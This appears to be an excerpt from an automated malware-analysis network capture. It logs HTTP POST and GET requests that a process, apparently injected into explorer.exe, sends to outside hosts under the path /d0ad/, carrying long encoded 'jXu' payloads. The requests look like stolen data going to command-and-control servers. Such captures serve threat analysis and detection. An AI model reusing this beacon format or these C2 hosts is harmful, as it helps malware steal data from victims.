Oct 26, 2022 13:19:06.398644924 CEST	1438	OUT	POST /d0ad/ HTTP/1.1 Host: www.mnrinstitutes.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.mnrinstitutes.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.mnrinstitutes.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 75 68 68 39 36 75 64 7a 67 69 68 70 36 53 78 70 63 54 41 54 52 72 4b 69 57 67 36 30 55 51 54 33 51 79 57 6b 4b 45 68 38 52 70 66 38 4a 74 6c 6b 52 4b 76 43 30 4c 77 2d 41 72 49 34 70 77 53 49 38 34 61 68 75 64 35 43 78 31 78 78 71 61 76 6e 4a 6f 44 31 71 6a 69 65 77 46 36 68 69 76 35 65 63 53 4f 54 4f 33 6f 34 67 6c 42 54 42 79 44 50 55 71 4e 53 56 6e 42 62 42 4c 5a 48 31 7a 31 67 6e 52 63 64 79 74 28 6e 51 68 6f 65 55 2d 73 73 44 43 55 51 65 56 38 6f 4a 61 7e 6b 46 38 54 6d 77 34 32 46 59 76 75 34 32 33 43 52 6b 64 4e 32 38 70 46 47 28 4e 51 52 33 30 31 6e 6a 6c 33 64 39 6f 35 46 51 35 28 38 53 5f 39 66 6a 37 79 6e 79 68 66 4a 51 77 67 53 6f 34 38 7a 4a 37 4d 4f 52 66 79 65 71 4e 36 32 5a 66 51 6e 4c 49 6e 58 68 31 33 57 34 4d 33 55 62 5a 5a 4b 4e 47 6f 6d 51 67 52 31 35 72 6a 75 37 48 70 5f 59 66 7a 66 4d 6d 56 4c 35 5f 31 50 69 4e 34 33 49 44 59 61 49 63 51 57 33 6e 42 47 73 78 77 30 43 30 53 7a 67 64 78 36 32 4a 48 67 36 34 7e 35 6e 4f 39 38 64 51 77 31 43 53 6b 31 48 38 59 4f 65 51 74 51 44 58 55 6e 53 43 53 35 64 6d 6f 2d 33 41 7a 76 59 34 4f 5a 59 35 34 56 6c 77 63 6a 56 58 6b 57 64 55 7a 4f 58 4c 47 67 54 71 65 62 37 71 70 32 75 62 66 63 77 59 79 37 58 52 6f 45 45 59 54 6b 69 33 31 36 55 42 56 34 4c 42 47 6d 77 6b 42 44 73 70 41 39 68 6f 57 38 70 56 46 42 46 67 46 62 56 6e 4f 66 4a 75 7a 33 7a 5a 36 78 30 48 41 6d 75 72 68 50 42 2d 6c 6c 68 6a 72 5a 7e 4f 48 63 4e 33 66 38 52 53 75 32 38 6b 43 62 6c 57 4b 69 6d 31 70 4f 79 4a 45 67 55 46 47 39 78 2d 36 53 59 32 63 6b 37 59 30 57 6f 6c 56 75 4a 4f 65 74 6e 79 54 37 4f 7a 67 34 38 56 75 79 64 73 30 66 56 5f 51 55 70 62 61 6f 46 77 77 6b 5a 70 42 6a 6a 32 31 6d 43 49 44 2d 49 68 4f 4b 50 50 51 5f 54 65 41 42 72 62 4e 75 62 36 46 33 30 56 34 2d 59 5a 61 72 6e 50 59 32 43 2d 4a 5f 49 48 5a 76 56 6e 58 54 53 79 6f 70 7e 51 4d 79 73 72 77 5f 48 61 48 48 33 72 48 5f 6f 61 32 57 37 6b 6f 70 6b 72 58 34 30 57 4c 6c 43 69 39 75 67 47 33 63 47 57 47 52 37 73 31 54 61 54 52 43 68 4b 34 48 6f 4e 4f 6f 46 64 36 6c 66 33 7e 78 28 32 34 41 74 58 4c 35 34 41 6b 4e 56 59 69 53 51 65 41 46 77 64 28 6d 78 63 38 65 6a 52 53 69 4d 4c 30 76 76 63 33 38 79 77 79 76 55 6f 56 5a 48 67 4b 78 66 6f 39 75 6c 4e 79 57 5a 64 43 50 4c 71 41 4b 6e 33 71 64 70 41 6f 2d 69 6c 57 47 36 46 7e 56 65 63 7e 51 76 6a 44 6e 64 72 4b 30 46 56 58 31 6e 6d 48 7a 74 72 63 42 41 58 57 31 71 75 6f 67 4f 4c 4a 77 4a 56 6d 32 6b 76 46 4a 76 47 47 61 31 47 33 4b 71 39 39 67 53 65 50 58 4f 49 56 62 39 49 35 63 57 74 59 43 7a 5a 49 78 34 53 61 4f 56 5f 53 4c 4c 4f 33 39 47 72 37 32 50 70 55 4e 7a 68 69 4d 57 41 5a 56 4a 78 49 62 48 6c 39 72 74 67 49 42 44 38 4a 37 72 4d 36 4a 67 4a 67 4c 45 41 64 4f 76 2d 6e 41 63 74 33 77 65 78 7e 34 6e 2d 6b 65 73 4a 44 44 48 4a 43 31 38 57 34 6f 59 62 79 52 75 78 34 58 65 79 45 46 78 6f 30 30 57 41 49 76 5a 4a 4a 74 61 6a 6e 6f 6c 75 44 31 77 39 70 4c 54 4b 28 34 43 74 55 33 7a 34 76 34 73 6c 53 41 49 4d 44 6d 77 39 44 78 76 51 6a 6a 73 33 72 35 59 6c 74 49 52 74 66 79 52 48 63 43 71 77 79 76 57 39 39 4d 44 47 48 5f 77 4a 37 33 54 68 71 50 4e 36 5a 62 74 6e 4e 35 28 47 75 71 68 46 73 66 31 6d 64 6c 70 74 4e 61 62 56 52 70 31 69 45 78 65 52 73 41 4f 69 53 65 39 57 34 30 6e 59 31 4e 35 6b 74 6f 32 41 4b 47 7a 77 62 37 74 4e 44 5a 46 58 42 65 56 31 6c 4a 51 39 6b 4a 58 76 4a 67 30 6c 75 61 76 5a 65 58 76 79 39 37 79 68 65 4e 62 34 62 6e 54 4a 33 6c 58 59 6f 33 4e 6d 47 5a 68 30 46 41 57 64 49 6c 31 64 64 55 59 57 48 4c 78 73 48 6d 36 6b 57 5f 68 77 42 41 46 62 6e 4f 71 44 51 56 28 39 73 75 66 62 56 45 58 4d 64 7a 50 48 76 69 4a 69 33 50 5a 6e 6e 57 43 68 79 42 46 6b 59 69 76 6d 55 51 69 55 4a 64 69 45 4e 62 49 56 6f 73 47 35 51 31 4b 70 7e 32 33 4f 38 54 4d 2d 63 47 44 7a 4d 35 69 4c 36 7a 44 58 6b 46 44 5f 6c 6d 6a 42 6b 51 43 66 30 74 69 4e 73 77 37 4c 49 6f 76 54 64 4b 71 75 4f 4a 48 45 34 38 73 79 51 79 55 51 7e 39 57 32 66 57 69 52 66 6d 57 35 74 77 7e 33 49 6b 4b 43 50 48 28 31 50 66 76 74 53 33 67 79 71 77 55 65 39 72 65 5f 61 62 6c 64 79 64 6c 5a 49 50 46 38 73 52 6f 45 4b 51 30 38 57 4e 64 6a 65 50 42 46 7e 65 77 6d 4b 79 33 57 79 43 5a 57 49 30 59 4b 44 Data Ascii: jXu=uhh96udzgihp6SxpcTATRrKiWg60UQT3QyWkKEh8Rpf8JtlkRKvC0Lw-ArI4pwSI84ahud5Cx1xxqavnJoD1qjiewF6hiv5ecSOTO3o4glBTByDPUqNSVnBbBLZH1z1gnRcdyt(nQhoeU-ssDCUQeV8oJa~kF8Tmw42FYvu423CRkdN28pFG(NQR301njl3d9o5FQ5(8S_9fj7ynyhfJQwgSo48zJ7MORfyeqN62ZfQnLInXh13W4M3UbZZKNGomQgR15rju7Hp_YfzfMmVL5_1PiN43IDYaIcQW3nBGsxw0C0Szgdx62JHg64~5nO98dQw1CSk1H8YOeQtQDXUnSCS5dmo-3AzvY4OZY54VlwcjVXkWdUzOXLGgTqeb7qp2ubfcwYy7XRoEEYTki316UBV4LBGmwkBDspA9hoW8pVFBFgFbVnOfJuz3zZ6x0HAmurhPB-llhjrZ~OHcN3f8RSu28kCblWKim1pOyJEgUFG9x-6SY2ck7Y0WolVuJOetnyT7Ozg48Vuyds0fV_QUpbaoFwwkZpBjj21mCID-IhOKPPQ_TeABrbNub6F30V4-YZarnPY2C-J_IHZvVnXTSyop~QMysrw_HaHH3rH_oa2W7kopkrX40WLlCi9ugG3cGWGR7s1TaTRChK4HoNOoFd6lf3~x(24AtXL54AkNVYiSQeAFwd(mxc8ejRSiML0vvc38ywyvUoVZHgKxfo9ulNyWZdCPLqAKn3qdpAo-ilWG6F~Vec~QvjDndrK0FVX1nmHztrcBAXW1quogOLJwJVm2kvFJvGGa1G3Kq99gSePXOIVb9I5cWtYCzZIx4SaOV_SLLO39Gr72PpUNzhiMWAZVJxIbHl9rtgIBD8J7rM6JgJgLEAdOv-nAct3wex~4n-kesJDDHJC18W4oYbyRux4XeyEFxo00WAIvZJJtajnoluD1w9pLTK(4CtU3z4v4slSAIMDmw9DxvQjjs3r5YltIRtfyRHcCqwyvW99MDGH_wJ73ThqPN6ZbtnN5(GuqhFsf1mdlptNabVRp1iExeRsAOiSe9W40nY1N5kto2AKGzwb7tNDZFXBeV1lJQ9kJXvJg0luavZeXvy97yheNb4bnTJ3lXYo3NmGZh0FAWdIl1ddUYWHLxsHm6kW_hwBAFbnOqDQV(9sufbVEXMdzPHviJi3PZnnWChyBFkYivmUQiUJdiENbIVosG5Q1Kp~23O8TM-cGDzM5iL6zDXkFD_lmjBkQCf0tiNsw7LIovTdKquOJHE48syQyUQ~9W2fWiRfmW5tw~3IkKCPH(1PfvtS3gyqwUe9re_abldydlZIPF8sRoEKQ08WNdjePBF~ewmKy3WyCZWI0YKDW5nI2hZQblTsow3Yi4vhqhCyZoyzzMd0gdzYwZF3wC2cwlvIrqHcqd71P9jf9PZchsUIFO_4pBveL8Kc0vDFamVBQLKV4c4jPTZZ2zkuSzPQzfiZfbq1hwMl7mIAs4ifRXGxk3IvWwrKO3Z2RsLUcSsEVFZdzVow20UiOyZaGDqWp~fvXRH(sORY04_(h1iLVWPOWarcgV8ZQtazxiXsWqEgMtKm0ctVjt8rMLO~zIhdYfEJvHZARw8PmLCDqqmaw3SlqvsNjkYebMW(u(X1aa3nrbBv5MbYKjdwXQQcl3oCNV8SDJ0rFzYmWxIX5Qhm_03pHwQiQbKOr8_~giOkUhDI3Czkusj0JnKySVlkJP3InE6YVv5dZPeijfy4L4O(g7-VLUeWOfxBV7ACQajL2LbgilJsnJjtTpd2oS7PB7BvMl5wYQM4_I0Kc9ijzuZE1HpB1VBqYBbnnX8dn7Xxp0GF9J1T87Qx2Ngvq7fnwUsrKoZq54QFUYmMSGRs3unH9FNvtPHtAEXoNdMgm04~uFYQEWHPQSTXk7DHjkCYlQ9azYMU8ZiyPcOzW45xC(-YW~ipFlsP1WOHW0yecAPKER-iTS6cTWTmZ04hq1mzdZIjCEwvYjHICvisMOLyvthF4bx3KFXqRuV8LGLS3f83Ue50L2xB2~mrOeT8ILLG-qpVGry7tM2F6(-uc79i8hbGUiC~DzFyTztbegR7LcxrNc1ymPXix6QwGep(DdNqAD4KASaSXkN4BwscFwOfvsDxVEB0I4uQ-Mlgw0JxIP62grumy3HdxqTUWUuiualFY7OtWkRJfAAZsZutOnD2hS_t5D6bwgEADAEVjSK0VxdVK1OT0~PicUeVIAqEe2nM-funnv2JRQSwXVAjcstYSYDYFJmfRIaHeZAh9x4~MQz3rg1rI2UdIUuUVMxiAX4wvQwjt8ZFx77JV1XMfEZl0WtuuhFIyKnohWvaAh4o-2VKjMu8W0J(Vop6vn_ZPWxyaFVm0ARXZ8_nij4m59qgtigvdTr272c2LZNhN7_DUzMfAbr4ns4~UqUeuQ5HY(N0QWH(Qy3A0IRwQpootiSgWP2zHY-60d6q1IREidGlFkXMufnIrPbzwfQf-tRYbUVCvTGQj97WUd2nokBIqe9gji6hv9Lf_g2EYWs4KH_wZOQSEEWUlbuuwLD5vELynvWGiIewOf6O4T-u24_1rAcUpcyN8zfS7yW3Oxj8_MK9gtq7LbOWNibFV2AnCl2H_gXKZB6UOIIXm4Ha1DDnE4rvlANO49icytLlyP5wulQODmOIeVXk14o7edbiJDTEuV_nnU7DYWdL_YDrUIfiJDIaxsrfZP6HCPnmpv9gRn6roLN3IvRZHdeP6OjgFH5kp52yAe0I6Uho1aacAidHBpHcytzz9~wCvxJGRoRO69A1xXGmecRpYspYktIn5Wi4WT55DxuYap42xukEkQZy8HHgQfiYNaD0vBHeICtxxkjX-oncWRHzcT9Htn7Ev3wM7MGmAfe75nCu5OPd4Nq7iiNKaXQnEh6P6DnkHzkFsD93xY-N-5gc-LELPwGPmwWpInnUM5O8Of9iENnFJBCGnlpEmJ97EqvJ2zKH-AChXO_d6p0FRgFjo6ejYpljI2HxU4Wply4t8xPZqRHykNaHTr6dT~7akpYYVFTbW4fBX9wrH25rHz3TJj-UL3jIjYBGtv1AaqGsJD62QlZp7ie(_8zjfvyIGTDSRVOxDdS0pZsjNPOpIgy~N5ztf3cXwzZO8lAmnPiCAycWeiAADZ5HJmUiffi7hXEp1jPM-IujYfwZxx0kvNTOstarw8Kfh7ho0zrhnudlfKUF66iXxpvgvo9SygTdzP-cxmFF9ueKxPU6sl9MxQjqXbiVqXbRRUgULbT6GHz1q8am6Ts0BrSFaTGjtn-mKXyyhRJF2Cod3PI5H8rlfJM3md98-hMmoUa~tXl3zGPtvUBScgWnlABnOVYUVKEvfDU(gUEA2yJTkc2BM0pcBKCwjlN4YM12qOVfHM4NVJOUTykwzQK~mJZHvafyQAMQqNLekzM69i4I4HKZfWeVT1m1JiH(QOsp9LctAR
Oct 26, 2022 13:19:06.398710012 CEST	1447	OUT	Data Raw: 54 35 54 57 52 4f 47 38 44 28 42 5a 47 61 54 62 73 48 36 45 79 37 52 31 69 63 4e 6a 59 76 79 38 48 70 68 35 4b 79 5a 41 4e 33 58 55 6b 65 64 5a 53 78 41 28 33 65 2d 57 52 32 39 66 41 62 39 50 45 32 52 53 71 74 32 59 77 67 47 76 65 72 4f 69 5f 43 Data Ascii: T5TWROG8D(BZGaTbsH6Ey7R1icNjYvy8Hph5KyZAN3XUkedZSxA(3e-WR29fAb9PE2RSqt2YwgGverOi_CS3b6DbPrdOe8meR1HOV1633bpEPucU7OTWi19095XUUW3alUD3rMghL2tz0ojid56KgkOM1Bz~n4T(sm0qsJWUOLOAP2Yqe(paNzzymII6qnAE0u8LecKvCfG2jRIiAkP2zn1g39e0EUmMPWV5zPi0_sqhtF0jn3Y
Oct 26, 2022 13:19:06.428078890 CEST	1450	OUT	Data Raw: 65 65 68 47 32 67 44 35 46 54 4a 47 50 6e 30 39 66 31 6a 38 43 6a 78 64 75 61 73 76 6f 65 52 5a 79 6e 6f 58 75 6a 6c 36 75 7e 37 35 4c 32 68 48 35 58 6c 4f 68 72 65 37 46 28 62 4e 56 55 64 47 4b 30 4f 6e 43 44 6b 6c 61 78 73 51 73 62 5f 75 39 47 Data Ascii: eehG2gD5FTJGPn09f1j8CjxduasvoeRZynoXujl6u~75L2hH5XlOhre7F(bNVUdGK0OnCDklaxsQsb_u9GGCv~kWXJeku4ixnKUrbYl9Nhy9rcOPIBXRLqNgmio2Cy0Pmobue6foNEfZNwRQ7BqmnkzC_0EHEZ9b2b5h3jVhIOb1LBQaxd1QeaJVrmuiAmCJatxlH7c(c(_Q45XNAEAlD~nlJj219~wtsSzKTyEOc~7sZv7nUT3
Oct 26, 2022 13:19:06.428106070 CEST	1450	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:19:06 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Oct 26, 2022 13:19:06.428246021 CEST	1453	OUT	Data Raw: 6c 35 2d 6a 69 45 55 6c 46 76 58 43 42 58 56 48 73 49 50 4c 4a 5a 35 78 59 56 71 77 77 76 63 71 37 65 75 54 54 58 39 7e 64 6f 58 72 4a 54 4e 57 64 4b 35 33 52 51 59 51 30 32 34 67 6d 62 47 47 6b 6e 53 36 47 7e 53 6e 64 4b 6d 56 4b 57 54 32 43 63 Data Ascii: l5-jiEUlFvXCBXVHsIPLJZ5xYVqwwvcq7euTTX9~doXrJTNWdK53RQYQ024gmbGGknS6G~SndKmVKWT2CcizCdebq2kUteoKsNpVg2TdXq8sVRI3CzaMFah6SJpaYGQiX1WmJY0i0ouTmVpwsgV3mfgWm6Dnosl(cMxgIl8~5ablAV8YUEFU_wYB1nOsihPF2gU5xRqdu5V8fwCjpw5O436EpXGh8VwDWT-(l4W5zRQQ1GEh6bq
Oct 26, 2022 13:19:06.428423882 CEST	1460	OUT	Data Raw: 47 75 74 39 43 46 5f 38 46 48 74 37 43 73 33 67 6d 41 6a 72 31 61 5f 66 6f 33 53 76 55 4d 6e 48 50 41 43 62 79 62 62 64 69 6d 5f 31 6b 56 76 6a 32 70 34 67 4e 6f 61 72 66 4a 4d 36 58 66 41 66 52 58 67 6d 4b 58 6f 67 48 6b 2d 7a 67 4d 71 44 4b 42 Data Ascii: Gut9CF_8FHt7Cs3gmAjr1a_fo3SvUMnHPACbybbdim_1kVvj2p4gNoarfJM6XfAfRXgmKXogHk-zgMqDKBlZRmTBE0rR8kiq37tztq36vXWKd7HFaq1EvveoX5ymmNarD(OucSAiYETcKUi97sDRO6vZm8JT2JgaNd4c39kkVwI57kNh8oN8jLeEKbN5z(Kgp3kCrZ5FSz8kbFySHjs4042zcUTtpP2AE73srmlBh1VTUMmrJm5
Oct 26, 2022 13:19:06.428592920 CEST	1473	OUT	Data Raw: 36 38 30 6a 71 76 6b 76 49 44 37 70 79 7e 6e 46 4d 7a 44 69 34 45 30 78 5f 48 76 62 46 77 73 43 64 43 71 54 53 6f 5a 54 45 56 35 76 53 72 53 4e 61 39 69 6c 65 65 4e 42 66 46 6a 73 5a 78 46 5a 6c 55 6b 66 45 4a 6e 38 64 68 4c 32 61 6f 62 78 6e 58 Data Ascii: 680jqvkvID7py~nFMzDi4E0x_HvbFwsCdCqTSoZTEV5vSrSNa9ileeNBfFjsZxFZlUkfEJn8dhL2aobxnX9epu1ChhVRGHUrFNkGPvuH4MfpH1BFXsXC1oUBRlEGyWOuHk1(To-QCCXS3ot2grfrQXJYyJoTWIWwuAOMGs77gBXL_xJxQ5_~jQR6X8lLIJte91U3_p7T0WslyJWuxQJGeY0QQzwB_eekLiiqjn_982gJ5QTytWv
Oct 26, 2022 13:19:06.457753897 CEST	1479	OUT	Data Raw: 74 50 6a 6b 6c 72 46 35 45 4a 42 54 32 4f 6b 58 47 54 5a 35 37 4b 6e 4d 57 73 38 66 4d 46 57 76 6e 79 6b 34 50 66 41 68 2d 63 51 39 68 38 5a 55 7a 58 67 63 6f 79 72 6c 6a 68 51 5a 44 41 49 58 53 6e 6f 7e 72 6b 7a 76 42 51 70 35 48 34 67 4c 51 34 Data Ascii: tPjklrF5EJBT2OkXGTZ57KnMWs8fMFWvnyk4PfAh-cQ9h8ZUzXgcoyrljhQZDAIXSno~rkzvBQp5H4gLQ42xf6uxbpww24z7M9rjkm1XQTuzD8CAYwLgvlGqQtwGCIC1gZd~YfQJoSP2nyxHAyLkzdHZUE4tyCbJ8XyRzIJOAJPCTLxDWu5WHcWpPomWku8PGzTCZqD(B(rlpe5jlcO6jf_r65owgo42gXTNxX4zrwYMQltiDsc
Oct 26, 2022 13:19:06.457880020 CEST	1487	OUT	Data Raw: 77 36 5f 68 51 4e 73 62 6f 57 68 61 6b 38 79 4d 68 50 41 38 4d 33 65 55 43 31 48 76 52 61 66 32 4e 6d 55 48 59 56 78 38 6c 28 4e 6b 32 79 39 7a 72 39 4f 35 77 78 50 69 38 6e 61 4e 73 47 72 35 69 68 4f 65 6c 6a 43 32 4c 34 4f 4d 4f 48 4a 68 63 72 Data Ascii: w6_hQNsboWhak8yMhPA8M3eUC1HvRaf2NmUHYVx8l(Nk2y9zr9O5wxPi8naNsGr5ihOeljC2L4OMOHJhcr9JNWn8UfsbYy7jA0SeCl2TOKE~IytMFIowZXuA2CN5OjGxKZhJEbHfIxF1tEbZTgOcZOO~rL2FDq9QhaXH7hNNow2U32dILsCwg7CT9p9wPY1fOlsTViUlPRcUrg5q7qOUEtO8o8Mw1sREviTO4DgtTHfcJAZfraq

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.11.20	49910	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:08.445184946 CEST	1488	OUT	GET /d0ad/?jXu=jjJd5e0DmTQo1TJERy8cZ6iwHgiAMW7tSAG3VG96MIrCLP8ueKug57ZRCpkKrz2d2a+jpP8qm1duoLHSN5X+t1/Y7kvplYFeFQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1 Host: www.mnrinstitutes.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:19:08.474714041 CEST	1488	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:19:08 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.11.20	49911	162.214.80.106	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:13.669433117 CEST	1489	OUT	POST /d0ad/ HTTP/1.1 Host: www.creotopi.biz Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.creotopi.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.creotopi.biz/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 31 5f 41 46 77 31 62 33 70 32 4c 69 51 4b 72 79 4d 75 59 67 62 72 62 4f 73 44 6e 38 30 33 77 4a 44 73 33 61 75 64 4d 50 68 39 75 57 36 62 42 45 7e 7a 51 5a 37 43 45 50 46 4a 76 69 75 62 37 55 7a 56 52 36 53 4d 57 71 75 51 74 4c 4d 66 32 54 61 72 28 57 42 53 4e 52 51 4b 56 62 64 43 71 70 76 41 42 71 6e 48 61 5a 4e 53 75 38 65 6c 67 4d 43 6d 4c 34 69 43 44 37 4a 73 79 73 70 66 41 6e 33 54 36 42 66 52 31 43 64 5a 32 79 34 46 69 64 76 6c 48 6e 62 30 6d 53 56 2d 43 6a 66 56 32 6d 6c 4e 5a 41 36 41 30 2d 73 63 5a 6d 4f 68 66 66 38 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=1_AFw1b3p2LiQKryMuYgbrbOsDn803wJDs3audMPh9uW6bBE~zQZ7CEPFJviub7UzVR6SMWquQtLMf2Tar(WBSNRQKVbdCqpvABqnHaZNSu8elgMCmL4iCD7JsyspfAn3T6BfR1CdZ2y4FidvlHnb0mSV-CjfV2mlNZA6A0-scZmOhff8A).
Oct 26, 2022 13:19:13.866512060 CEST	1490	IN	HTTP/1.1 302 Found Date: Wed, 26 Oct 2022 11:19:13 GMT Server: Apache Location: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 72 65 6f 74 6f 70 69 2e 62 69 7a 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.creotopi.biz/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.11.20	49912	162.214.80.106	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:15.886722088 CEST	1491	OUT	POST /d0ad/ HTTP/1.1 Host: www.creotopi.biz Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.creotopi.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.creotopi.biz/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 31 5f 41 46 77 31 62 33 70 32 4c 69 53 71 62 79 4e 4e 77 67 4d 37 62 4e 70 44 6e 38 37 58 77 4e 44 74 4c 61 75 5a 55 66 30 66 4b 57 36 2d 46 45 35 78 34 5a 36 43 45 50 52 5a 76 6a 78 4c 37 68 7a 56 64 63 53 49 57 71 75 54 52 4c 4e 70 4b 54 64 62 28 52 4b 79 4e 53 58 4b 56 59 5a 43 72 6d 76 41 46 51 6e 44 4b 5a 4e 68 71 38 45 6e 34 4d 47 30 76 33 31 79 44 39 5a 63 79 72 6e 5f 41 70 33 54 32 34 66 56 35 38 64 76 65 79 35 6b 43 64 75 6c 48 6b 52 45 6d 56 64 65 44 56 54 41 44 54 38 4d 39 72 6a 44 5a 43 6f 39 42 78 41 6a 65 58 76 46 53 66 7e 4a 61 61 4b 32 34 42 75 65 66 35 76 4b 54 42 41 6d 34 36 63 32 45 5f 57 43 5a 45 4c 35 59 47 73 45 45 54 7e 6e 6d 45 52 44 38 51 57 52 4e 72 5a 7a 52 57 68 61 35 36 45 4b 61 46 41 77 4e 32 28 72 70 43 43 69 75 45 72 30 28 6a 6c 4a 66 4d 67 42 6a 6a 46 6b 6f 57 31 32 67 6e 72 66 38 6e 76 70 58 76 30 4c 52 58 39 47 72 67 36 45 50 6a 79 6f 4f 61 37 74 68 4f 42 32 7a 37 4c 70 53 34 79 32 28 75 4d 43 66 75 66 78 32 33 48 37 35 4f 77 55 58 4e 73 42 35 4f 45 33 47 6d 53 62 30 35 50 30 54 39 44 42 77 65 33 43 6d 42 42 59 53 62 38 4f 58 59 55 32 65 77 75 69 75 62 5a 35 75 63 68 44 4c 6b 6a 4c 6e 4d 34 52 33 62 57 50 6a 33 7e 53 55 5f 62 58 4c 5a 45 41 54 6a 56 43 79 51 71 78 61 6a 6a 37 68 59 45 73 48 36 63 33 72 32 36 51 77 4f 6d 51 6c 2d 68 4a 56 77 63 59 45 52 58 5a 4f 71 62 6e 51 55 58 38 76 79 4e 36 56 4d 73 4b 66 2d 59 6a 71 71 4c 57 36 34 46 54 5a 43 37 59 4a 68 6d 61 79 77 68 63 66 4d 31 47 61 6e 4b 43 65 41 4b 6e 34 72 7a 6b 6a 39 56 7a 7e 4d 53 47 35 65 32 2d 64 57 66 41 41 76 39 64 36 31 46 65 49 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=1_AFw1b3p2LiSqbyNNwgM7bNpDn87XwNDtLauZUf0fKW6-FE5x4Z6CEPRZvjxL7hzVdcSIWquTRLNpKTdb(RKyNSXKVYZCrmvAFQnDKZNhq8En4MG0v31yD9Zcyrn_Ap3T24fV58dvey5kCdulHkREmVdeDVTADT8M9rjDZCo9BxAjeXvFSf~JaaK24Buef5vKTBAm46c2E_WCZEL5YGsEET~nmERD8QWRNrZzRWha56EKaFAwN2(rpCCiuEr0(jlJfMgBjjFkoW12gnrf8nvpXv0LRX9Grg6EPjyoOa7thOB2z7LpS4y2(uMCfufx23H75OwUXNsB5OE3GmSb05P0T9DBwe3CmBBYSb8OXYU2ewuiubZ5uchDLkjLnM4R3bWPj3~SU_bXLZEATjVCyQqxajj7hYEsH6c3r26QwOmQl-hJVwcYERXZOqbnQUX8vyN6VMsKf-YjqqLW64FTZC7YJhmaywhcfM1GanKCeAKn4rzkj9Vz~MSG5e2-dWfAAv9d61FeI.
